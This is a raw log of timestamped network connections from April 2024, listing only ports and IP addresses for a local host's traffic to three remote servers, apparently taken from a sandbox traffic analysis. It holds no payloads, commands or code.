Apr 19, 2024 19:12:09.631650925 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.631720066 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.632612944 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.632704973 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.633649111 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.633668900 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.633708000 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.633754969 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.633764982 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.633814096 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.635445118 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.635488987 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.635548115 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.635555983 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.635621071 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.637285948 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.637360096 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.637387991 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.637393951 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.637450933 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.639122963 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.639167070 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.639235020 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.639240980 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.639286995 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.639338970 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.640924931 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.640973091 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.641035080 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.641041994 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.641133070 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.642682076 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.642726898 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.642781973 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.642790079 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.642847061 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.644917011 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.644961119 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.645016909 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.645024061 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.645080090 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.727130890 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.727201939 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.727329016 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.727338076 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.727468967 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.728429079 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.728494883 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.728552103 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.728558064 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.728616953 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.729923010 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.729969978 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.730025053 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.730031967 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.730089903 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.731746912 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.731797934 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.731894970 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.731904984 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.731991053 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.733630896 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.733685017 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.733772039 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.733778000 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.733839989 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.735461950 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.735507965 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.735589981 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.735596895 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.735673904 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.738089085 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.738131046 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.738243103 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.738250971 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.738337994 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.739896059 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.739942074 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.740006924 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.740014076 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.740076065 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.741731882 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.741777897 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.741830111 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.741837025 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.741903067 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.743990898 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.744035959 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.744065046 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.744071960 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.744096041 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.744122028 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.744164944 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.744225979 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.744231939 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.744275093 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.744306087 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.744349003 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.744359016 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.744366884 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:11.059777975 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:11.261223078 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:11.261308908 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:11.262631893 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:11.492624044 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:11.496407986 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:11.698127985 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:11.702312946 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:11.747405052 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:11.814302921 CEST | 49740 | 80 | 192.168.2.4 | 178.237.33.50 |
Apr 19, 2024 19:12:11.904633045 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:11.904867887 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:11.905674934 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.020503998 CEST | 80 | 49740 | 178.237.33.50 | 192.168.2.4 |
Apr 19, 2024 19:12:12.021322012 CEST | 49740 | 80 | 192.168.2.4 | 178.237.33.50 |
Apr 19, 2024 19:12:12.021416903 CEST | 49740 | 80 | 192.168.2.4 | 178.237.33.50 |
Apr 19, 2024 19:12:12.117659092 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.117686033 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.117703915 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.117722988 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.117830038 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.117830038 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.231025934 CEST | 80 | 49740 | 178.237.33.50 | 192.168.2.4 |
Apr 19, 2024 19:12:12.231111050 CEST | 49740 | 80 | 192.168.2.4 | 178.237.33.50 |
Apr 19, 2024 19:12:12.244008064 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.320122004 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320156097 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320178986 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320198059 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320216894 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320235968 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320254087 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320275068 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.320341110 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.320342064 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.320342064 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.320342064 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.501070023 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523699045 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523730993 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523749113 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523768902 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523787022 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523804903 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523825884 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523844004 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523863077 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523884058 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523894072 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.523894072 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.523894072 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.523894072 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.523917913 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523936033 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523955107 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523972988 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.523992062 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.524010897 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.524147034 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.524147034 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.524147034 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.524147034 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726154089 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726187944 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726207018 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726226091 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726336956 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726336956 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726469994 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726502895 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726522923 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726542950 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726561069 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726583004 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726602077 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726619005 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726643085 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726661921 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726680040 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726691008 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726700068 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726691008 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726691008 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726691008 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726717949 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726737022 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726747036 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726757050 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726766109 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726767063 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726768017 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.726775885 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726788044 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726824999 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726844072 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726861954 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726880074 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726897955 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726918936 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726937056 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726954937 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.726973057 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.727020025 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.727020025 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.727020025 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.727020025 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.727020979 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.727020979 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929366112 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929389954 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929408073 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929426908 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929445028 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929450035 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929467916 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929474115 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929485083 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929506063 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929516077 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929524899 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929543018 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929543018 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929560900 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929578066 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929596901 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929598093 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929620028 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929624081 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929641962 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929658890 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929675102 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929675102 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929692984 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929694891 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929711103 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929729939 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929744959 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929747105 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929764986 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929765940 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929783106 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929800034 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929816008 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929816961 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929836988 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929837942 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929857016 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929873943 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929889917 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929891109 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929908037 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929910898 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929925919 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929944038 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.929958105 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929980040 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.929996014 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930012941 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930030107 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930047989 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930049896 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930066109 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930083036 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930088043 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930099964 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930118084 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930124044 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930139065 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930154085 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930155993 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930172920 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930191040 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930208921 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930228949 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
